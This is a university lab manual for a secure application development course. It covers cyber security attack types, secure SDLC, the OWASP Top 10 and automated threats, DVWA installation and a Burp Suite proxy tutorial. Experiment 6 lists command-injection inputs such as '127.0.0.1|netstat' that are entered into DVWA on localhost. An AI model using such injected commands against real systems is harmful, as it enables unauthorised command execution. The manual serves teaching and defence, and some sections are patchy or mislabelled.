ICOE/IT/7TH SEM/SAD/LAB MANUAL

Indala College of Engineering, Bapsai.

Department
Of
Information Technology
Secure Application Development Lab Manual

Indala College of Engineering, Bapsai.

DEPARTMENT OF INFORMATION TECHNOLOGY
Lab Manual for the Academic Year 2024-25

1
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

(In accordance with Mumbai university syllabus)

NAME :

ROLL NO :

SUBJECT : SAD Lab

SUBJECT CODE: ITL703

SEMESTER : VII

STREAM : Information Technology

Subject In-charge
Asst. Prof. Gauri Bhosale

2
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Lab Objectives: Students will be able:

1. To understand the secure programming of application code.

2. To understand the owasp methodologies and standards.

3. Understand and Identify main vulnerabilities inherent in applications.

4. Understand how Data Validation and Authentication can be applied for application.

5. Understand how to apply Security at Session Layer Management.

6. Understand how to apply to secure coding for cryptography.

Lab Outcome: Students will learn to:

1. Apply secure programming of application code.

2. Understand the owasp methodologies and standards.

3. Identify main vulnerabilities inherent in applications.

4. Apply Data Validation and Authentication for application

5. Apply Security at Session Layer Management

6. Apply secure coding for cryptography.

Hardware Requirements:
PC With following Configuration

1. Intel Core i3/i5/i7 Processor

2. 4 GB RAM

3. 500 GB Hard disk

Software Requirements:
1. Web Application, HTML5, CSS3, Java, C, Python, MySQL or Database Software.

2. Internet Connection, Browser, Security tools. SAST tools etc.

3
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

INTRODUCTION:
This manual is organized in such a way that the students can directly use it in the laboratory.

Each laboratory exercise comprises of:

1. Statement of the problem (Aim)

2. Theory

3. Output

4. Conclusion

4
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

LIST OF EXPERIMENTS
LO PO PSO Week
Sr.No. Title of Experiment addressed addressed addressed number

1 To Study of different laws L703.1 PO1,PO6 PSO1 W1

and
standards of cyber security.
2 To learn Case study for SDLC L703.2 PO1 PSO1 W2
3 To study of Threat Modeling L703.2 PO2,PO5 L703.2 L703.2
PO2,PO5 PO2,PO5
PSO2 W3 PSO2 W3
4 To study at least any 5 L703.2 PO2 PSO2 W4
methodologies of OSWAP
5 To study at least any 5 OAT L 703.2 PO2, PO3 PSO2 W5
Denial of Inventory for E-
commerce Website

6 To apply SQL injection L703.4 PO4 PSO3 W7

vulnerability that allows login
page to bypass.

7 7To Implement Burp proxy to L703.5 PO3 PSO3 W8

test web applications
8 To study Symmetric and L703.6 PO1 PSO1 W9
Asymmetric cryptography

9 To study and understand L703.6 PO1,PO3 PSO1 W10

Hashing

5
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 1: Study various standards of cyber security

1. Aim: To study of different laws and standards of cyber security.

2. Objectives: After study of this experiment, the student will be able to
●Understand different cyber security laws.

●Identify and learn different standards of cyber security.

3. Outcomes: After study of this experiment, the student will be able to

●Demonstrate knowledge of different laws and standards of cyber security.

4. Prerequisite: Programming concepts, Cyber security.

5. Requirements: PC and Internet
6. Brief Theory:
Cyber Security Introduction:
Cyber security is the most concerned matter as cyber threats and attacks are overgrowing. Attackers are now
using more sophisticated techniques to target the systems. Individuals, small-scale businesses or
large organization, are all being impacted. So, all these firms whether IT or non-IT firms have understood the
importance of Cyber Security and focusing on adopting all possible measures to deal with cyber threats.

What is cyber security?

"Cyber security is primarily about people, processes, and technologies working together to encompass
the full range of threat reduction, vulnerability reduction, deterrence, international engagement,
incident response, resiliency, and recovery policies and activities, including computer network operations,
information assurance, law enforcement, etc." OR Cyber security is the body of technologies, processes, and
practices designed to protect networks,computers, programs and data from attack, damage or unauthorized
access. ∙ The term cyber security refers to techniques and practices designed to protect digital data. ∙The data
that is stored, transmitted or used on an information system. OR Cyber security is the protection of
Internet-connected systems, including hardware,software, and data from cyber-attacks. It is made up of two
words one is cyber and other is security. Cyber is related to the technology which contains systems, network
and programs or data.Whereas security related to the protection which includes systems security, network
securityand application and information security.

Why is cyber security important?

Listed below are the reasons why cyber security is so important in what’s become a predominant
digital world:

1. Cyber-attacks can be extremely expensive for businesses to endure. ∙ In addition to financial damage suffered
by the business, a data breach can also inflict untold reputational damage.

2. Cyber-attacks these days are becoming progressively destructive. Cybercriminals are using more
sophisticated ways to initiate cyber-attacks.

6
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

3. Regulations such as GDPR are forcing organizations into taking better care of the personal data they hold.
Because of the above reasons, cyber security has become an important part of the business and the focus now
is on developing appropriate response plans that minimize the damage in the event of a cyber-attack.

Types of Cyber Attacks

A cyber-attack is an exploitation of computer systems and networks. It uses malicious code to alter computer
code, logic or data and lead to cybercrimes, such as information and identity theft.

Cyber-attacks can be classified into the following categories:

1) Web-based attacks
2) System-based attacks
Web-based attacks
These are the attacks which occur on a website or web applications. Some of the important web-based attacks
are as follows

1. Injection attacks

It is the attack in which some data will be injected into a web application to manipulate the application and
fetch the required information. Example- SQL Injection, code Injection; log Injection, XML Injection etc.

2. DNS Spoofing DNS spoofing is a type of computer security hacking. Whereby a data is introduced into
a DNS resolver's cache causing the name server to return an incorrect IP address, diverting traffic to the
attackers’ computer or any other computer. The DNS spoofing attacks can go on for a long period of time
without being detected and can cause serious security issues.

3. Session Hijacking:

It is a security attack on a user session over a protected network. Web applications create cookies to store the
state and user sessions. By stealing the cookies, an attacker can haveaccess to all of the user data.

4. Phishing:

Phishing is a type of attack which attempts to steal sensitive information like user login credentials and
credit card number. It occurs when an attacker is masquerading as a trustworthy entity in electronic
communication.

5. Brute force:

It is a type of attack which uses a trial and error method. This attack generates a large number of guesses and
validates them to obtain actual data like user password and personal identification number. This
attack may be used by criminals to crack encrypted data, or by security, analysts to test an organization's
network security.

6. Denial of Service:

It is an attack which meant to make a server or network resource unavailable to the users. It accomplishes this
by flooding the target with traffic or sending it information that triggers a crash. It uses the single system and
single internet connection to attack a server. It can be classified into the following

●Volume-based attacks- Its goal is to saturate the bandwidth of the attacked site, and is measured in bit per
second.

7
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

●Protocol attacks- It consumes actual server resources, and is measured in a packet.

●Application layer attacks- Its goal is to crash the web server and is measured in request per second.

7. Dictionary attacks:

This type of attack stored the list of a commonly used password and validated them to get original password.

8. URL Interpretation:

It is a type of attack where we can change the certain parts of a URL, and one can make a web server to deliver
web pages for which he is not authorized to browse.

9. File Inclusion attacks:

It is a type of attack that allows an attacker to access unauthorized or essential files which is available on the
web server or to execute malicious files on the web server by making use of the include functionality.

10. Man in the middle attacks:

It is a type of attack that allows an attacker to intercepts the connection between client and server and acts as
a bridge between them. Due to this, an attacker will be able to read, insertand modify the data in the
intercepted connection.

System-based attacks:

These are the attacks which are intended to compromise a computer or a computer network.Some of the
important system-based attacks are as follows

1. Virus:

It is a type of malicious software program that spread throughout the computer files without the knowledge
of a user. It is a self-replicating malicious computer program that replicates by inserting copies of itself into
other computer programs when executed. It can also execute instructions that cause harm to the system.

2. Worm:

It is a type of malware whose primary function is to replicate itself to spread to uninfected computers. It
works same as the computer virus. Worms often originate from email attachments that appear to
be from trusted senders.

3. Trojan horse:

It is a malicious program that occurs unexpected changes to computer setting and unusual activity, even when
the computer should be idle. It misleads the user of its true intent. It appears to be a normal application but
when opened/executed some malicious code will run in the background.

4. Backdoors:

It is a method that bypasses the normal authentication process. A developer may create a backdoor so that an
application or operating system can be accessed for troubleshooting or other purposes.

5. Bots:

A bot (short for "robot") is an automated process that interacts with other network services.Some bots
program run automatically, while others only execute commands when they receive specific input.
Common examples of bots program are the crawler, chatroom bots, and malicious bots

8
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

7. Laboratory Exercise
i. Procedure

i. Study and explain various laws of cyber security

ii. Write various standard of cyber security

ii. Result/Observation/Program code

8. Post-Experiments Exercise

A. Extended Theory:

Describe statistics of main vulnerabilities

B. Questions:

1. What are the different types of attacks?

2. What do you understand by cyber-attack?

C. Conclusion:

1. Write what was performed in the experiment.

2. Write the significance of the topic studied in the experiment.

D. References:

1. https://mrcet.com/pdf/Lab%20Manuals/IT/CYBER%20SECURITY%20(R18A0521).pdf

2. Cyber Security Essentials, James Graham, Richard Howard and Ryan Otson, CRCPress.

3. Introduction to Cyber Security, Chwan-Hwa (John) Wu, J. David Irwin, CRC Press T&F Group

9
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 2: To learn Case study for SDLC

Aim: To learn Case study for SDLC.
Objectives: After study of this experiment, the student will be able to Understand different steps of SDLC
Outcomes: After study of this experiment, the student will be able to demonstrate knowledge of different
stages SDLC.
Prerequisite: Cyber security, software engineering
Requirements: PC and Internet
Pre-Experiment Exercise:
Brief Theory:
What Is Secure SDLC and Why Is Important?
Security System Development Life Cycle (SecSDLC) is defined as the set of procedures that are executed in a
sequence in the software development cycle (SDLC). It is designed such that it can help developers to create
software and applications in a way that reduces the security risks at later stages significantly from the start.
The Security System Development Life Cycle (SecSDLC) is similar to Software Development Life Cycle (SDLC),
but they differ in terms of the activities that are carried out in each phase of the cycle. SecSDLC eliminates
security vulnerabilities. The process involves identification of certain threats and the risks they impose
on a system as well as the needed implementation of security controls to counter remove and manage the
risks involved. Whereas, in the SDLC process, the focus is mainly on the designs and implementations of an
information system.

Phases involved in SecSDLC are:

●System Investigation: This process is started by the officials/directives working at the top level
management in the organization. The objectives and goals of the project are considered priory in order to
execute this process. An Information Security Policy is defined which contains the descriptions of security
applications and programs installed along with their implementations in organization’s system.

●System Analysis: In this phase, detailed document analysis of the documents from the System Investigation
phase is done. Already existing security policies, applications and software are analyzed in order to check
for different flaws and vulnerabilities in the system. Upcoming threat possibilities are also analyzed. Risk
management comes under this process only.

●Logical Design: The Logical Design phase deals with the development of tools and following blueprints
that are involved in various information security policies, their applications and software. Backup and recovery
policies are also drafted in order to prevent future losses. In case of any disaster, the steps to take in business
are also planned. The decision to outsource the company project is decided in this phase. It is analyzed whether
the project can be completed in the company itself or it needs to be sent to another company for the specific
task.

●Physical Design: The technical teams acquire the tools and blueprints needed for the implementation of
the software and application of the system security. During this phase, different solutions are investigated for
any unforeseen issues which may be encountered in the future. They are analyzed and written down in order
to cover most of the vulnerabilities that were missed during the analysis phase.

10
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

●Implementation: The solution decided in earlier phases is made final whether the project is in-house or
outsourced. The proper documentation is provided of the product in order to meet the requirements
specified for the project to be met. Implementation and integration process of the project are carried
out with the help of various teams aggressively testing whether the product meets the system
requirements specified in the system documentation.

●Maintenance: After the implementation of the security program it must be ensured that it is functioning
properly and is managed accordingly. The security program must be kept up to date accordingly in order to
counter new threats that can be left unseen at the time of design.

Laboratory Exercise
Procedure
Study any of the case study from references and the difference between software development life cycle and
security development life cycle Result/Observation/Program code Purpose of the case study with findings
Post-Experiments Exercise

Extended Theory:
Describe how secure coding can be incorporated into the software development process.List the major types
of coding errors and their root cause.Describe good software development practices and explain how
they impact application security.

Questions:
List and discuss Secure SDLC Best Practices

Conclusion:
Write what was performed in the experiment.

Write the significance of the topic studied in the experiment.

References:
Case study 1: https://quod.lib.umich.edu/j/jsais/11880084.0001.103/--case-study-of-the-application-of-
the-systems-development?rgn=main;view=fulltext

Case study 2: https://onlinelibrary.wiley.com/doi/epdf/10.1002/sec.1700https://snyk.io/learn/secure-sdlc/

11
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 3: To study Threat Modelling

Aim: To study Threat Modeling.
Objectives: After study of this experiment, the student will be able to identify security requirements, pinpoint
security threats and potential vulnerabilities, quantify threat and vulnerability criticality,and prioritize
remediation methods.

Outcomes: After study of this experiment, the student will be able to Produces a detailed document that
captures potential threats, severity, mitigation ideas, and the corresponding actions.

Prerequisite: software engineering

Requirements: PC and Internet, Microsoft Threat Model
Brief Theory:

12
ICOE/IT/7TH SEM/SAD/LAB MANUAL

13
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Conclusion: Threat modelling was implemented successfully.

14
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 4: To Study of OWASP Top 10 Security Risks or

vulnerabilities by OWASP
Objective:
●To describe a standard awareness document for developers and web application security.

●To understand the Owasp methodologies and standards

Course Outcome: Illustrate the Owasp methodologies and standards.

Theory: What is OWASP Top 10?

The OWASP Top 10 is a standard document which consists of the top ten of the most impactful web application
security risks in the world. The Open Web Application Security Project foundation (OWASP) publishes a version
every three years. OWASP collects data from companies which specialize in application security. It also collects
data from individuals using industry surveys. All of the results get ranked based on impact and prevalence. At
last, the top ten risks are then filtered. OWASP Top ten doesn’t cover all the vulnerabilities, but it’s a solid start
for security testers, developers and organizations who want to exploit vulnerabilities and implement
measures to protect against the security risks.
OWASP Top 10 vulnerabilities

This section provides you with the OWASP Top 10 summary of all the security risks. For each one of them, there
are links to dedicated posts which detail the theory and help you practice on hands-on challenges. Once you
finish it to the end, you will have a solid understanding and will be ready to test the OWASP Top 10 vulnerabilities
on your own.

Injection
An injection is a security risk that you can find on pretty much any target. Basically, it happens when a server-
side interpreter processes untrusted user input as part of a command or a query. There are many
vulnerabilities which cause injection. Here are some

examples:
●SQL injection: You can find a SQL injection when the developer runs a SQL query that takes a parameter you
control as an input. If you successfully exploit it, you steal data from the database, edit it or delete it altogether.

●OS command injection: It happens when user input is used as part of an insecure call to operating system
commands. If you find one, you can run arbitrary operating system commands on the vulnerable server.

●XPATH injection: It targets the query language typically used in XML. When you can control part of the query.
Therefore, you can bypass restrictions, read unauthorized XML nodes, etc.

●Server-Side Template Injection: This flaw affects applications which use template engines to render
server-side data. If you can control variables passed into the template, you can achieve remote code execution.

●LDAP Injection: When your target insecurely uses some user input to query an LDAP directory,
you can perform an injection to bypass restrictions, read unauthorized data, etc

●Broken authentication and session management: Authentication is a feature which verifies an identity’s
claims. For example, when you login into an application, it uses your username and password to verify that you
are indeed who you are claiming to be. Upon authentication, and due to the stateless nature of HTTP, the

15
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

application provides you with a session representing your identity, which your web browser sends on your
subsequent requests. Of course, you need to be able to sign up, log in, reset your password or enable Multi-
Factor authentication. That’s why authentication is hard to implement without making any mistakes.
Any flaw in one of those features can lead to broken authentication. We cover this

in detail in a dedicated blog post.

Sensitive data exposure:

If your IT assets disclose data which is not meant to be publicly accessible, they suffer from sensitive data
exposure. On the one hand, this data can be at rest, like your databases or files.On the other hand, it can be in
transit, especially if you are using unencrypted or weak encryption for your data transmission. Apart from
exposing your customers’ data which is a scandal, you will also get fines for exposing them. Think of the GDPR
regulation where fines can go up to 20 million Euros.

XML-External Entity (XXE):

XXE is a flaw in the way XML parsers get configured. Specifically, this vulnerability happens when the XML parser
can evaluate DTDs and external entities. It allows an attacker to achieve many exploits, like listing directories
and reading files from the server. It can even provoke a Denial of Service.

Broken access control:

Broken access control happens when the application allows a user to perform unauthorized actions. There are
many vulnerabilities which contribute to this risk, For instance, if the developer forgets to validate
permissions when dealing with identifiers, the application becomes vulnerable to Insecure Direct Object
Reference (IDOR). Other vulnerabilities include Cross-site Request Forgery (CSRF), Cross-Origin Resource
Sharing (CORS) misconfigurations and forced browsing. Read more about them in the dedicated blog
post.

Security misconfiguration:
Security misconfigurations, as the name suggests, expose vulnerabilities due to weak configurations
of an IT asset. It doesn’t affect web assets only. Any component which requires a configuration is
subject to this vulnerability. This means that network devices, hardware, email services, etc. can suffer from this
vulnerability. For instance, your smart door lock can have a predefined default administration PIN code. If you
don’t change it, anyone can access and change your device configuration. In the context of web applications,
you can find things like directory listing enabled, which would allow you to list all files and directories. Or maybe
the developer forgot to disable the debug mode, allowing you to get more insights on the inner-workings of the
vulnerable application.

Cross-site Scripting (XSS):

This is one of the famous client-side vulnerabilities. It allows an attacker to run arbitrary Javascript code on the
victim’s web browser. XSS becomes possible when user input ends up inside an HTML page or a piece of
Javascript code without proper encoding. There are basically three types of XSS, all of them along
with hands-on tutorials are

explained further:

●Stored XSS happens when the user input gets stored in the application’s datastore, then retrieved back and
rendered in a page without proper encoding.

16
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

●Reflected XSS happens when user input gets directly returned into the HTML page without proper
encoding.

●DOM XSS happens when user input gets inside a Javascript code. Here, it is possible to exploit XSS even if
there is no request made to the server.

Insecure deserialization
Insecure deserialization happens when the developer doesn’t check serialized data that a user sends to the
application. This is another vulnerability where a lack of user input validation can lead to serious security
problems. It is hard to exploit, but when it works, it can lead to either remote code execution or denial of service.
Using components with known vulnerabilities You might have totally secured your own code, but what about
the dependencies you are using? Have you checked them or just imported them into your code? There is a high
chance that one or more of them are vulnerable. Unfortunately, using components with known
vulnerabilities had led to many serious breaches in the past, and will still cause many breaches to come.
But you already have the tools to check for them. For more in-depth knowledge of that, head to this dedicated
article. Insufficient logging and monitoring When a hacker infiltrates a network, IT systems will generate traffic
which usually doesn’t correspond to the normal one, unless you are dealing with highly skilled hackers who have
time and money to go after your IT infrastructure. If you can’t detect this abnormal behavior as
soon as possible, you are essentially giving them enough time to achieve their goal. Read more about this in this
blog post.Logging and monitoring should be part of your essential security infrastructure because you simply
cannot defend what you don’t know.

OWASP Top 10 vulnerabilities 2021:

●A01:2021-Broken Access Control moves up from the fifth position to the category with the most serious web
application security risk; the contributed data indicates that on average, 3.81% of applications tested had
one or more Common Weakness Enumerations (CWEs) with more than 318k occurrences of CWEs in this risk
category. The 34 CWEs mapped to Broken Access Control had more occurrences in applications than any other

category.

●A02:2021-Cryptographic Failures shifts up one position to #2, previously known as A3:2017-Sensitive

Data Exposure, which was broad symptom rather than a root cause. The renewed name focuses on failures
related to cryptography as it has been implicitly before. Thiscategory often leads to sensitive data
exposure or system compromise.

●A03:2021-Injection slides down to the third position. 94% of the applications were tested for some form of
injection with a max incidence rate of 19%, an average incidence rate of 3.37%, and the 33 CWEs mapped into
this category have the second most occurrences in applications with 274k occurrences. Cross-site Scripting is
now part of this category in thisedition.

●A04:2021-Insecure Design is a new category for 2021, with a focus on risks related to design flaws. If we
genuinely want to "move left" as an industry, we need more threat modelling, secure design patterns and
principles, and reference architectures. An insecure design cannot be fixed by a perfect implementation as by
definition, needed security controls were never created to defend against specific attacks elated to
identification failures. This category is still an integral part of the Top 10, but the increased availability of
standardized frameworks seems to be helping.

●A08:2021-Software and Data Integrity Failures is a new category for 2021, focusing on making assumptions
related to software updates, critical data, and CI/CD pipelines without verifying integrity. One of the highest
weighted impacts from Common Vulnerability and Exposures/Common Vulnerability Scoring System (CVE/CVSS)

17
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

data mapped to the 10 CWEs in this category. A8:2017-Insecure Deserialization is now a part of this larger
category.

●A09:2021-Security Logging and Monitoring Failures was previously A10:2017- Insufficient Logging &
Monitoring and is added from the Top 10 community survey, moving up from previously. This category is
expanded to include more types of failures, is challenging to test for, and isn't well represented in the CVE/CVSS
data. However, failures in this category can directly impact visibility, incident alerting, and forensics.

●A10:2021-Server-Side Request Forgery is added from the Top 10 community survey. The data shows a
relatively low incidence rate with above average testing coverage, along with above-average ratings for Exploit
and Impact potential. This category represents the scenario where the security community members are
telling us this is important, even though it's not illustrated in the data at this time.

Conclusion: OWASP Top 10 Web App Vulnerabilities represents a broad consensus among security experts of
the most common security risks facing organizations. The vision behind OWASP Top 10 Application Security
Risks is to build a culture of secure web development and web application security through awareness creation.

18
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 5: Study of 5 OAT Denial of Inventory.

Objective:
●To describe a standard awareness document for developers and web application security.

●To understand the OAT Threats, detection methods and countermeasures.

Course Outcome: Illustrate the Owasp methodologies and standards.

Theory:
Selection and holding of items from a limited inventory or stock, but which are never actually bought, or paid
for, or confirmed, such that other users are unable to buy/pay/confirm the items themselves. It differs from
OAT-005 Scalping in that the goods or services are never actually acquired by the attacker. Denial of Inventory
is most commonly thought of as taking ecommerce items out of circulation by adding many of them to a
cart/basket; the attacker never actually proceeds to checkout to buy them but contributes to a possible stock-
out condition. A variation of this automated threat event is making reservations (e.g. hotel rooms,
restaurant tables, holiday bookings, flight seats), and/or click-and-collect without payment. But this
exhaustion of inventory availability also occurs in other types of web application such as in the assignment of
non-goods like service allocations, product rations, availability slots, queue positions, and budget
apportionments. If server resources are reduced see OAT-015 Denial of Service instead. OAT-005 Scalping,
Denial of Inventory also reduces the availability of goods or services.Other Names and Examples Hoarding;
hold all attack; Inventory depletion; Inventory exhaustion; Stock exhaustion

OAT Top 5 vulnerabilities:

This section provides you with the OAT summary of all the security risks.

Login & Account Fraud:

Automated Threats Related to Compromising Account Credentials:

• OAT-007 Credential Cracking: Seeks to hijack customers’ accounts through multiple variations of
credentials, and it can be identified by an increase in failed login attempts.
• OAT-008 Credential Stuffing: Reuse of stolen credentials to see if they match the ones used on the
site, leading to account takeover.
• OAT-019 Account Creation: Creates new fake accounts for nefarious purposes, such as spreading
malware or evading defenses by acting like a different user when carrying out automated attacks.
• Inventory Abuse:Automated Threats Related to Availability of Inventory to Legitimate Users:
• OAT-005 Scalping: Checks on the availability of in-demand inventory. If you are experiencing
unexplained traffic increases to low or limited availability inventory, you might be the subject
of a scalping bot.
• OAT-013 Sniping: Grabs inventory at the last minute. If you find that some of your “customers” are
having amazing success at scooping up inventory at the last minute, you may be the target of a sniping
bot.
• OAT-021 Denial of Inventory: Ties up stock that never gets purchased, leading real customers to
search elsewhere for their desired items.
• OAT-017 Spamming: Adds phony comments to forums and other messaging apps to falsify
information or distribute malware.
• Checkout Abuse: Automated Threats Related to Payment Card or Gift Cards:

19
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

oOAT-001 Carding: Similar to credential stuffing, except that it uses stolen credit card numbers to
see which ones are valid. You can look for an increase in failed payments and chargebacks to identify a carding
attack.

oOAT-002 Token Cracking: Much like credential cracking, except that it tries out token codes in a bid to take
advantage of discounts, coupons, etc.

oOAT-010 Card Cracking: Tries to identify expiration dates, card security codes, and more via brute
force attacks to complete the card info. This kind of automated threat is often combined with OAT-001
Carding to verify the card details and OAT-12 Cashing Out to purchase items. The remaining automated
threats relate to Web Apps and Infrastructure of e-Commerce businesses:

●OAT-003 Ad Fraud: Falsifies the number of ad clicks or impressions to siphon off or deplete marketing
budgets.

●OAT-004 Fingerprinting: Sends requests to infrastructure and profiles it for later exploitation.

●OAT-006 Expediting: Uses bots to speed up normal processes.

●OAT-009 CAPTCHA Defeat: Bots and services, such as CATPCHA farms, can solve CAPTCHA challenges and
tests for humans to prove that they’re not robots.

●OAT-011 (Price and Content) Scraping: Lots of bots scrape data with intent to resell or even duplicate
competitors’ content, leading to lower SEO rankings, among other things.

●OAT-014 Vulnerability Scanning: Unauthorized scanning that identifiesvulnerabilities that malicious

bot operators can exploit.

●OAT-015 (Application) Denial of Service (DoS): Deliberate, malicious overwhelming of the application’s
resources, which can either slow down or render a website or web app unavailable for customers to use.

●OAT-016 Skewing: Fraudulent requests for content or synthetic bot traffic that degrades the accuracy
of web metrics. Much like fingerprinting, but specific to probing the application itself to find out its
vulnerabilities tacks and the lost revenue associated with them. If bots and other automated threats overwhelm
your site and take your online store down for just two days, you have easily lost a inimum of $548K
in revenue. Suppose the same business protects just 50% of its traffic with a bot management solution. In
that case, it’s $50 million (or $137K per day) that the organization can count on annually and not
lose to downtime caused by bots, along with the additional financial impact associated with online fraud such
as successful credential stuffing, carding and cracking attacks. The list of potential business and financial impacts
of bot attacks is endless. What Can You Do about Automated Threats in e-Commerce?The only way to fight
automation is with automation. That’s because adversaries adapt in

seconds, and traditional bot detection solutions can’t keep up. What’s needed is an approach that instantly
detects and defends against bots, even those not seen before, using a zero-trust approach to ensure that
nothing unknown or untrusted gets in. Such a solution should operate without heuristics to learn, rules to
manage, or risk scores to assign — and must be resilient to retooling and reverse-engineering efforts. Essentially,
a tool that fights back and makes attacks too expensive to conduct and frustrates and deceives attackers, while
adapting to new threats in real time. To win the game of whack-a-mole, you must architect your solution to be
just as effective years from now as it is today, while eliminating the economic imbalance between attacks and
defenders.

That solution which protects from the very first request so that your organization is defended even against bots
not seen before. That solution provides the industry’s most accurate bot detection solution and has flipped the

20
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

bot mitigation approach on its head with a fundamentally different approach that identifies the presence of
automation itself that exists user experience because solution defends against bots invisibly without the use of
CAPTCHAs.

Conclusion: OAT Top Web App Threats represents a broad consensus among security experts of
the most common security risks facing organizations

21
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 6: To apply SQL injection vulnerability that allows login page

to bypass.

Objective: Understand and Identify main vulnerabilities inherent in applications.

Outcome: Identify main vulnerabilities inherent in application.
Theory: Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a classroom environment. The
aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of
difficulty, with a simple straightforward interface.

OS command injection vulnerability:

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating
system via a vulnerable application. Command injection attacks are possible when an application
passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually executed with the privileges
of the vulnerable application. Command injection attacks are possible largely due to insufficient
input validation.

Steps to install DVWA:

1. Download and install XAMPP on your computer.

UCOE/IT /7th sem/ SAD / Lab Manual

2. Download DVWA from GitHub

3. Open XAMPP and start ‘Apache and MySQL’

4. Extract DVWA downloaded file in htdocs that will be available in C:\xampp

5. Open htdocs folder and rename ‘DVWA-master’ to ‘dvwa’

6. A filename ‘config.inc.php.dist ‘ rename it to ‘config.inc.php’ it willbe available in

C:\xampp\htdocs\dvwa\config

7. type ‘127.0.0.1/dvwa’ in the URL of the browser if you get error connecting to dvwa goto

step 8

8. Open with notepad config.inc.php in C:\xampp\htdocs\dvwa\config and change db_user to

root and db_password to blank as shown in fig below

22
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

9. Now, again type ‘127.0.0.1/dvwa’ in the URL of the browser,

10. click on ‘Create / Reset Database’

11. Click on ‘Login’ or it will automatically redirect to the login page,

12. The default username is ‘admin’ and the password is ‘password’ login with the credentials.

13. Perform os command injection on dvwa.

Input/Output:

Change the security settings one by one Low -> medium -> high -> impossible

23
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

command Injection on windows on:Low Security Ping 127.0.0.1

127.0.0.1&dir

127.0.0.1|netstat

127.0.0.1|tracert 127.0.0.1

24
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Medium Security
Ping 127.0.0.1

127.0.0.1|netstat

127.0.0.1|pathping 127.0.0.1

25
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

127.0.0.1|tracert 127.0.0.1

Conclusion: Successfully installed Xampp, dvwa and performed command injection with all
security levels low, high medium

26
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 7: To Implement Burp proxy to test web applications

Outcome:- Apply Data validation and authentication for applications
Thoery:-

⮚What is Burp Suite?

Burp or Burp Suite is a set of tools used for penetration testing of web applications. It is developed by the
company named Portswigger, which is also the alias of its founder Dafydd Stuttard. BurpSuite aims to be an all
in one set of tools and its capabilities can be enhanced by installing add-ons that are called BApps. It is the
most popular tool among professional web app security researchers and bug bounty hunters. Its ease of use
makes it a more suitable choice over free alternatives like OWASP ZAP. Burp Suite is available as a
community edition which is free, professional edition that costs $399/year and an enterprise
edition that costs $3999/Year. This article gives a brief introduction to the tools offered by
BurpSuite. If you are a complete beginner in Web Application Pentest/Web App Hacking/Bug Bounty,
we would recommend you to just read through without thinking too much about a term.

●Steps to Download and Install Burp Suite:-

Download and install

●Step 1: Download

Use the links below to download the latest version of Burp Suite Professional or Community

Edition.

https://portswigger.net/burp/releases/professional-community-2022-8-4?

requestededition=community&requestedplatform=

●Step 2: Install Run the installer and launch Burp Suite.

When asked to select a project file and configuration, just click Next and then Start Burp to

skip this for now.

●Step 3: Start exploring Burp Suite

If you're completely new to Burp Suite, follow the rest of this tutorial for an interactive, guided

tour of the core features.

●Steps 4: for intercepting HTTP traffic with Burp Proxy

27
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Intercept HTTP traffic with Burp Proxy In this tutorial, you'll use a live, deliberately vulnerable website to learn
how to intercept requests with Burp Proxy. Intercepting a request Burp Proxy lets you intercept HTTP requests
and responses sent between Burp's browser andthe target server. This enables you to study how the
website behaves when you perform different actions.

●Step 1: Launch Burp's browser

Go to the Proxy > Intercept tab. Click the Intercept is off button, so it toggles to Intercept is on

Click Open Browser. This launches Burp's browser, which is preconfigured to work with Burp right out of the
box.Position the windows so that you can see both Burp and Burp's browser.

●Step 2: Intercept a request

Using Burp's browser, try to visit https://portswigger.net and observe that the site doesn't load.

Burp Proxy has intercepted the HTTP request that was issued by the browser before it could

reach the server. You can see this intercepted request on the Proxy > Intercept tab.

The request is held here so that you can study it, and even modify it, before forwarding it to the target server.

28
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

●Step 3: Forward the request

Click the Forward button several times to send the intercepted request, and any subsequent ones, until the
page loads in Burp's browser.

●Step 4: Switch off interception

Due to the number of requests browsers typically send, you often won't want to intercept every single one of
them. Click the Intercept is on button so that it now says Intercept is off.

Go back to the browser and confirm that you can now interact with the site as normal.

●Step 5: View the HTTP history

In Burp, go to the Proxy > HTTP history tab. Here, you can see the history of all HTTP traffic that has passed
through Burp Proxy, even while interception was switched off. Click on any entry in the history to view the raw
HTTP request, along with the corresponding response from the server.

This lets you explore the website as normal and study the interactions between Burp's browser and the server
afterward, which is more convenient in many cases.

●Steps for Modifying HTTP requests with Burp Proxy Modifying HTTP requests with Burp Proxy In this tutorial,
you'll learn how to modify an intercepted request in Burp Proxy. This enables you to manipulate the request in
ways that the website isn't expecting in order to see how it responds. Using one of our deliberately vulnerable
